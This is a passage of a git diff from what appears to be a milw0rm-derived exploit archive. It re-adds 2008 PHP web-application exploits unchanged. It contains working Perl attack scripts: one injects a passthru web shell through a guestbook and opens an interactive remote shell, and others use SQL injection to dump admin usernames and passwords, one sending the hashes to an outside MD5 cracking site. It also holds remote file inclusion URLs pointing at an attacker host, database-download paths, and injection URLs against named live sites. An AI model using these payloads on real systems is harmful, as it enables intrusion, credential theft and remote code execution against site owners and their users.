+print " / XXXXXX / \n";
+print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+print " (________( \n";
+print " `------' \n";
+print " \n";
+
+if ($#ARGV != 0)
+{
+ print "Usage: ./xpl.pl <URL to index page>\n";
+ print "Ex. ./xpl.pl http://www.target.com/maxsite/index.php\n";
+ exit();
+}
+
+$index = $ARGV[0];
+$upload_url = $index."?name=guestbook&file=message";
+
+print "\n[+] Trying to Inject the Code...\n";
+
+$ua = LWP::UserAgent->new ();
+$post = HTTP::Request->new (POST => $upload_url);
+$post->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+$post->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+$post->header (Accept_Language => 'en-us,en;q=0.5');
+$post->header (Content_Type => 'application/x-www-form-urlencoded');
+$post->content ('name=CWH&aim=CWH&email=CWH&site=http%3A%2F%2Fcitec.us&message=%3C%3Fphp+%0D%0Aif%28get_magic_quotes_gpc%28%29%29%0D%0A%7B+%0D%0A%09%24_GET%5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0Apassthru%28%24_GET%5Bcmd%5D%29%3B+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0A%3F%3E&submitButtonName=Submit');
+
+$response = $ua->request ($post);
+
+if ($response->code ne 200) {
+ print "\nRCE Exploit Failed\n";
+ exit();
+}
+
+print "\nSuccessfully Inject Code !!!\n\n";
+print "[cwh-shell]# ";
+chomp ($cmd = <STDIN>);
+
+while ($cmd ne "exit") {
+
+
+ $url = $index."?name=guestbook&cmd=".$cmd;
+
+ $req = HTTP::Request->new (GET => $url);
+ $req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+ $req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+ $req->header (Accept_Language => 'en-us,en;q=0.5');
+
+
+ $response = $ua->request 
($req);
+ $content = $response->content;
+
+ if ($content !~ /\#\#%\$\$%\#\#/) {
+ print ("Exploit Failed\n");
+ exit();
+ }
+
+ while ($content =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {
+ print $1;
+ }
+
+ print "\n[cwh-shell]# ";
+ chomp ($cmd = <STDIN>);
+
+}
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7323.txt b/platforms/php/webapps/7323.txt
index df6e13996..0606fdf2e 100755
--- a/platforms/php/webapps/7323.txt
+++ b/platforms/php/webapps/7323.txt
@@ -1,44 +1,44 @@
-#===========================================================
-#
-# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
-#
-#===========================================================
-#
-# VENDOR: Sunbyte URL: http://www.sunbyte.net/
-# APP: Sunbyte e-Flower (eCommerce webapp)
-# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
-# AUTHOR: W4RL0CK
-# DATE: 29/11/08
-# VULN.: SQL INJECTION
-#
-#
-# WEBSITE: http://warlock.iblogger.org
-# CONTACT: w4rl0ck@hackermail.com
-#
-#===========================================================
-#
-# Expl0itin6:
-#
-# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
-#
-# Liv3 dEm0:
-#
-# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
-#
-#
-#
-# now, use y0ur imaginati0n! ;)
-# note: there could be more vulnerabilities in the application
-#
-#===========================================================
-#
-# gr33tz t0 >>>>>>>>> CHIL34N T34M <<<<<<<<<<<<
-# ===================================================
-# [ we ar3: Vicent0! 
~ ThE.Xin0x ~ Par4d0gX ~ W4RL0CK ]
-# ===================================================
-#
-# and all m3mb3rs of: [MiTM.cL] & str0ke
-#
-#===========================================================
-
-# milw0rm.com [2008-12-02]
+#===========================================================
+#
+# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
+#
+#===========================================================
+#
+# VENDOR: Sunbyte URL: http://www.sunbyte.net/
+# APP: Sunbyte e-Flower (eCommerce webapp)
+# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
+# AUTHOR: W4RL0CK
+# DATE: 29/11/08
+# VULN.: SQL INJECTION
+#
+#
+# WEBSITE: http://warlock.iblogger.org
+# CONTACT: w4rl0ck@hackermail.com
+#
+#===========================================================
+#
+# Expl0itin6:
+#
+# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
+#
+# Liv3 dEm0:
+#
+# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
+#
+#
+#
+# now, use y0ur imaginati0n! ;)
+# note: there could be more vulnerabilities in the application
+#
+#===========================================================
+#
+# gr33tz t0 >>>>>>>>> CHIL34N T34M <<<<<<<<<<<<
+# ===================================================
+# [ we ar3: Vicent0! ~ ThE.Xin0x ~ Par4d0gX ~ W4RL0CK ]
+# ===================================================
+#
+# and all m3mb3rs of: [MiTM.cL] & str0ke
+#
+#===========================================================
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7324.txt b/platforms/php/webapps/7324.txt
index 33ad5afb8..02545a604 100755
--- a/platforms/php/webapps/7324.txt
+++ b/platforms/php/webapps/7324.txt
@@ -1,22 +1,22 @@
----------------------------------------------------------------------------
-
-Script Name: Rapid Classified
-
-Version: v3.1
-
-Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft
-
-Author: CoBRa_21
-
-My Web Site: www.ipbul.org
-
----------------------------------------------------------------------------
-
-Exploit:
-
-http://localhost/[PATH]/db/cldb.mdb
-
-
----------------------------------------------------------------------------
-
-# milw0rm.com [2008-12-02]
+---------------------------------------------------------------------------
+
+Script Name: Rapid Classified
+
+Version: v3.1
+
+Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft
+
+Author: CoBRa_21
+
+My Web Site: www.ipbul.org
+
+---------------------------------------------------------------------------
+
+Exploit:
+
+http://localhost/[PATH]/db/cldb.mdb
+
+
+---------------------------------------------------------------------------
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7328.pl b/platforms/php/webapps/7328.pl
index 0ced36a0a..aa8f5fb15 100755
--- a/platforms/php/webapps/7328.pl
+++ b/platforms/php/webapps/7328.pl
@@ -1,96 +1,96 @@
-#!/usr/bin/perl -w
-#=====================================================================
-# Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
-#=====================================================================
-#
-# ,--^----------,--------,-----,-------^--,
-# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
-# `+---------------------------^----------|
-# `\_,-------, _________________________|
-# / XXXXXX /`| /
-# / XXXXXX / `\ /
-# / XXXXXX /\______(
-# / XXXXXX /
-# / XXXXXX /
-# (________(
-# `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 3 December 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : Check Up New Generation
-#VERSION : 4.52
-#VENDOR : http://checkup.sourceforge.net/
-#DOWNLOAD : http://downloads.sourceforge.net/checkup/checknew_4.52.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#######################################################################################
-#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
-
-if ($#ARGV+1 != 2)
-{
- print "\n==============================================\n";
- print " Check New Remote SQL Injection Exploit \n";
- print " \n";
- print " Discovered By CWH Underground \n";
- print "==============================================\n";
- print " \n";
- print " ,--^----------,--------,-----,-------^--, \n";
- print " | ||||||||| `--------' | O \n";
- print " `+---------------------------^----------| \n";
- print " `\_,-------, _________________________| \n";
- print " / XXXXXX /`| / \n";
- print " / XXXXXX / `\ / \n";
- print " / XXXXXX /\______( \n";
- print " / XXXXXX / \n";
- print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
- print " (________( \n";
- print " `------' \n";
- print " \n";
- print "Usage : ./xpl.pl <URL to PATH> <Dump Limit>\n";
- print "Example: ./xpl.pl http://www.target.com/checknew 10\n";
- exit();
-}
-
-$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else {
- print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
- exit;
-}
-}
-
-# milw0rm.com [2008-12-03]
+#!/usr/bin/perl -w
+#=====================================================================
+# Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
+#=====================================================================
+#
+# ,--^----------,--------,-----,-------^--,
+# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------|
+# `\_,-------, _________________________|
+# / XXXXXX /`| /
+# / XXXXXX / `\ /
+# / XXXXXX /\______(
+# / XXXXXX /
+# / XXXXXX /
+# (________(
+# `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 3 December 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : Check Up New Generation
+#VERSION : 4.52
+#VENDOR : http://checkup.sourceforge.net/
+#DOWNLOAD : http://downloads.sourceforge.net/checkup/checknew_4.52.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#######################################################################################
+#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
+
+if ($#ARGV+1 != 2)
+{
+ print "\n==============================================\n";
+ print " Check New Remote SQL Injection Exploit \n";
+ print " \n";
+ print " Discovered By CWH Underground \n";
+ print "==============================================\n";
+ print " \n";
+ print " ,--^----------,--------,-----,-------^--, \n";
+ print " | ||||||||| `--------' | O \n";
+ print " `+---------------------------^----------| \n";
+ print " `\_,-------, _________________________| \n";
+ print " / XXXXXX /`| / \n";
+ print " / XXXXXX / `\ / \n";
+ print " / XXXXXX /\______( \n";
+ print " / XXXXXX / \n";
+ print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+ print " (________( \n";
+ print " `------' \n";
+ print " \n";
+ print "Usage : ./xpl.pl <URL to PATH> <Dump Limit>\n";
+ print "Example: ./xpl.pl http://www.target.com/checknew 10\n";
+ exit();
+}
+
+$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . 
$ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else {
+ print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+ exit;
+}
+}
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7331.pl b/platforms/php/webapps/7331.pl
index 38fb52db1..68c937cb8 100755
--- a/platforms/php/webapps/7331.pl
+++ b/platforms/php/webapps/7331.pl
@@ -1,65 +1,65 @@
-#!/usr/bin/perl -w
-# -----------------------------------------------------------
-# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
-# by s3rg3770 with athos :)
-# demo http://www.disneyrama.com
-# -----------------------------------------------------------
-# Note: In lulz we trust :O
-# -----------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-use LWP::Simple;
-
-
-my $host = shift;
-my $myid = shift or &help;
-
-my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
- "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
- "from+jos_users+where+id=${myid}--";
-
-my $http = new LWP::UserAgent(
- agent => 'Mozilla/4.5 [en] (Win95; U)',
- timeout => '5',
- );
-
-
-my $response = $http->get($host.$path);
-
-if($response->content =~ /!_(.+?)!_/i)
-{
- print STDOUT "Hash MD5: $1\n";
- print STDOUT "Password: ".search_md5($1)."\n";
- exit;
-}
-else
-{
- print STDOUT "Exploit Failed!\n";
- exit;
-}
-
-
-
-sub search_md5
-{
- my $hash = shift @_;
- my $cont = undef;
-
- $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
-
- if(length($hash) < 32 && !is_error($cont))
- {
- return $cont;
- }
-}
-
-
-sub help
-{
- print STDOUT "Usage: perl $0 [host] [user ID]\n";
- print STDOUT "by athos - staker[at]hotmail[dot]it\n";
- exit;
-}
-
-# milw0rm.com [2008-12-03]
+#!/usr/bin/perl -w
+# -----------------------------------------------------------
+# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
+# by s3rg3770 with athos :)
+# demo http://www.disneyrama.com
+# -----------------------------------------------------------
+# Note: In lulz we trust :O
+# -----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+
+my $host = shift;
+my $myid = shift or &help;
+
+my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
+ "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
+ "from+jos_users+where+id=${myid}--";
+
+my $http = new LWP::UserAgent(
+ agent => 'Mozilla/4.5 [en] (Win95; U)',
+ timeout => '5',
+ );
+
+
+my $response = $http->get($host.$path);
+
+if($response->content =~ /!_(.+?)!_/i)
+{
+ print STDOUT "Hash MD5: $1\n";
+ print STDOUT "Password: ".search_md5($1)."\n";
+ exit;
+}
+else
+{
+ print STDOUT "Exploit Failed!\n";
+ exit;
+}
+
+
+
+sub search_md5
+{
+ my $hash = shift @_;
+ my $cont = undef;
+
+ $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
+
+ if(length($hash) < 32 && !is_error($cont))
+ {
+ return $cont;
+ }
+}
+
+
+sub help
+{
+ print STDOUT "Usage: perl $0 [host] [user ID]\n";
+ print STDOUT "by athos - staker[at]hotmail[dot]it\n";
+ exit;
+}
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7332.txt b/platforms/php/webapps/7332.txt
index 459000147..06111fef7 100755
--- a/platforms/php/webapps/7332.txt
+++ b/platforms/php/webapps/7332.txt
@@ -1,35 +1,35 @@ -########################################################################### -#-----------------------------OffensiveTrack------------------------------# -########################################################################### - - - ----------------------------- Tunisia Muslim ------------------------------ - - -#found by : OffensiveTrack -#Author : AlpHaNiX -#website : www.offensivetrack.org - - -#contact : AlpHa[AT]HACKER[DOT]BZ - - -########################################################################### - -#script : ASP User Engine .NET -#download : http://shop.robs-projects.com/UE_DotNET.html - - - - - -#Exploit : -http://target.com/users.mdb - - -#special thanks for the dear DexTer for his help :$ - -########################################################################### - -# milw0rm.com [2008-12-03] +########################################################################### +#-----------------------------OffensiveTrack------------------------------# +########################################################################### + + + +---------------------------- Tunisia Muslim ------------------------------ + + +#found by : OffensiveTrack +#Author : AlpHaNiX +#website : www.offensivetrack.org + + +#contact : AlpHa[AT]HACKER[DOT]BZ + + +########################################################################### + +#script : ASP User Engine .NET +#download : http://shop.robs-projects.com/UE_DotNET.html + + + + + +#Exploit : +http://target.com/users.mdb + + +#special thanks for the dear DexTer for his help :$ + +########################################################################### + +# milw0rm.com [2008-12-03] diff --git a/platforms/php/webapps/7335.txt b/platforms/php/webapps/7335.txt index 547b13421..5cc0a5da9 100755 --- a/platforms/php/webapps/7335.txt +++ b/platforms/php/webapps/7335.txt 
@@ -1,50 +1,50 @@ -========================================================================== - - - [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability - - Software : Multi SEO phpBB version 1.1.0 - - Vendor : http://www.phpbb-seo.de/ - - Download : http://www.phpbb-seo.de/downloads/multi.html - - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -========================================================================== - - - [o] Vulnerable file - - - include/global.php - - - include_once ($pfad . 'include/config.php'); - - - - [o] Exploit - - http://localhost/[path]/include/global.php?pfad=[evilcode] - - -========================================================================== - - - [o] Greetz - - MainHack BrotherHood [ http://mainhack.com/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] - - -========================================================================== - -# milw0rm.com [2008-12-03] +========================================================================== + + + [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability + + Software : Multi SEO phpBB version 1.1.0 + + Vendor : http://www.phpbb-seo.de/ + + Download : http://www.phpbb-seo.de/downloads/multi.html + + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +========================================================================== + + + [o] Vulnerable file + + + include/global.php + + + include_once ($pfad . 
'include/config.php'); + + + + [o] Exploit + + http://localhost/[path]/include/global.php?pfad=[evilcode] + + +========================================================================== + + + [o] Greetz + + MainHack BrotherHood [ http://mainhack.com/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +========================================================================== + +# milw0rm.com [2008-12-03] diff --git a/platforms/php/webapps/7336.txt b/platforms/php/webapps/7336.txt index 6309cb62e..ec57053d4 100755 --- a/platforms/php/webapps/7336.txt +++ b/platforms/php/webapps/7336.txt 
@@ -1,96 +1,95 @@ - -/* - - $Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $ - - ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities - found by cOndemned - - download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip - - Probably prior versions are vulnerable too... - - Greetz: ZaBeaTy, str0ke, TBH, Avantura - -*/ - - -0x01 : - file : - /index.php - poc : - http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt? - source : - - 18. //includes - 19. if(!isset($cct_base)) - 20. $cct_base = ""; - 21. - 22. include_once($cct_base."includes/header.php"); - 23. include_once($cct_base."includes/login.php"); - -0x02 : - - file : - /handle/proxy.php - poc : - http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt? - source : - - 3. if(!isset($cct_base)) - 4. $cct_base= "../"; - 5. include_once($cct_base."includes/header.php"); - 6. include_once($cct_base."includes/config.php"); - -0x03 : - - file : - /includes/header.php - poc : - http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt? - source : - - 5. if(!isset($cct_base)) - 6. $cct_base= ""; - 7. include_once($cct_base."includes/functions.php"); - 8. include_once($cct_base."includes/config.php"); - 9. include_once($cct_base."includes/pluginLoader.php"); - 10. include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php"); - 11. //include is used because language file is included once in config.php file - 12. include_once($cct_base."includes/tiddler.php"); - 13. include_once($cct_base."includes/user.php"); - -0x04 : - - file : - /includes/include.php - poc : - http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt? - source : - - 3. include_once($cct_base."includes/ccAssignments.php"); - -0x05 : - - file : - /includes/workspace.php - poc : - http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt? 
- source : - 3. include_once($cct_base."includes/header.php"); - 4. include_once($cct_base."includes/user.php"); - 5. include_once($cct_base."includes/tiddler.php"); - -0x06 : - - file : - /plugins/RSS/files/rss.php - poc : - http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt? - source : - - 3. include_once($cct_base."includes/header.php"); - -EoF. - -# milw0rm.com [2008-12-04] +/* + + $Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $ + + ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities + found by cOndemned + + download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip + + Probably prior versions are vulnerable too... + + Greetz: ZaBeaTy, str0ke, TBH, Avantura + +*/ + + +0x01 : + file : + /index.php + poc : + http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt? + source : + + 18. //includes + 19. if(!isset($cct_base)) + 20. $cct_base = ""; + 21. + 22. include_once($cct_base."includes/header.php"); + 23. include_once($cct_base."includes/login.php"); + +0x02 : + + file : + /handle/proxy.php + poc : + http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt? + source : + + 3. if(!isset($cct_base)) + 4. $cct_base= "../"; + 5. include_once($cct_base."includes/header.php"); + 6. include_once($cct_base."includes/config.php"); + +0x03 : + + file : + /includes/header.php + poc : + http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt? + source : + + 5. if(!isset($cct_base)) + 6. $cct_base= ""; + 7. include_once($cct_base."includes/functions.php"); + 8. include_once($cct_base."includes/config.php"); + 9. include_once($cct_base."includes/pluginLoader.php"); + 10. include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php"); + 11. //include is used because language file is included once in config.php file + 12. include_once($cct_base."includes/tiddler.php"); + 13. 
include_once($cct_base."includes/user.php"); + +0x04 : + + file : + /includes/include.php + poc : + http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt? + source : + + 3. include_once($cct_base."includes/ccAssignments.php"); + +0x05 : + + file : + /includes/workspace.php + poc : + http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt? + source : + 3. include_once($cct_base."includes/header.php"); + 4. include_once($cct_base."includes/user.php"); + 5. include_once($cct_base."includes/tiddler.php"); + +0x06 : + + file : + /plugins/RSS/files/rss.php + poc : + http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt? + source : + + 3. include_once($cct_base."includes/header.php"); + +EoF. + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7338.txt b/platforms/php/webapps/7338.txt index 607dcf54c..41d641952 100755 --- a/platforms/php/webapps/7338.txt +++ b/platforms/php/webapps/7338.txt 
@@ -1,35 +1,35 @@ -########################################################################### -#-----------------------------OffensiveTrack------------------------------# -########################################################################### - - - - ----------------------------- Tunisia Muslim ------------------------------ - - -#found by : OffensiveTrack -#Author : AlpHaNiX -#website : www.offensivetrack.org - - - -#contact : AlpHa[AT]HACKER[DOT]BZ - - -########################################################################### - -#script : User Engine ASP Lite -#download : http://www.robs-projects.com/Apps/Download/download.aspx?file=ASP_UELite - - - -#Exploit : -http://target.com/users.mdb - - -#special thanks for syst3m and crimeirc staff - -########################################################################### - -# milw0rm.com [2008-12-04] +########################################################################### +#-----------------------------OffensiveTrack------------------------------# +########################################################################### + + + + +---------------------------- Tunisia Muslim ------------------------------ + + +#found by : OffensiveTrack +#Author : AlpHaNiX +#website : www.offensivetrack.org + + + +#contact : AlpHa[AT]HACKER[DOT]BZ + + +########################################################################### + +#script : User Engine ASP Lite +#download : http://www.robs-projects.com/Apps/Download/download.aspx?file=ASP_UELite + + + +#Exploit : +http://target.com/users.mdb + + +#special thanks for syst3m and crimeirc staff + +########################################################################### + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7339.txt b/platforms/php/webapps/7339.txt index dbda1a5ad..31e17b367 100755 --- a/platforms/php/webapps/7339.txt +++ b/platforms/php/webapps/7339.txt 
@@ -1,29 +1,29 @@ -[~] ASP Template Creature DD/SQL Multiple Remote Vuln. -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] ----------------------------------------------------------- - - -exp for demo: ( DD ) - -http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb - -exp for demo: ( sql inj ) - -user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser - -pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-12-04] +[~] ASP Template Creature DD/SQL Multiple Remote Vuln. +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] ----------------------------------------------------------- + + +exp for demo: ( DD ) + +http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb + +exp for demo: ( sql inj ) + +user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser + +pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-12-04] 
diff --git a/platforms/php/webapps/7341.txt b/platforms/php/webapps/7341.txt index 323331cd6..02e090747 100755 --- a/platforms/php/webapps/7341.txt +++ b/platforms/php/webapps/7341.txt 
@@ -1,53 +1,53 @@ -============================================================================================================= - - - [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability - - Software : lcxBBportal version 0.1 Alpha 2 - Vendor : http://code.google.com/p/lcxbbportal/ - Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -============================================================================================================= - - - [o] Vulnerable file - - portal/includes/portal_block.php - - include($phpbb_root_path . 'includes/bbcode.' . $phpEx); - - includes/acp/acp_lcxbbportal.php - - $phpbb_portal_path = $phpbb_root_path . 'portal/'; - require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx); - require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx); - include($phpbb_root_path . 'includes/functions_display.' . $phpEx); - - - - [o] Exploit - - http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode] - http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode] - - -============================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! 
[ http://malingsial.serverisdown.org/ ] - - -============================================================================================================= - -# milw0rm.com [2008-12-04] +============================================================================================================= + + + [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability + + Software : lcxBBportal version 0.1 Alpha 2 + Vendor : http://code.google.com/p/lcxbbportal/ + Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +============================================================================================================= + + + [o] Vulnerable file + + portal/includes/portal_block.php + + include($phpbb_root_path . 'includes/bbcode.' . $phpEx); + + includes/acp/acp_lcxbbportal.php + + $phpbb_portal_path = $phpbb_root_path . 'portal/'; + require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx); + require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx); + 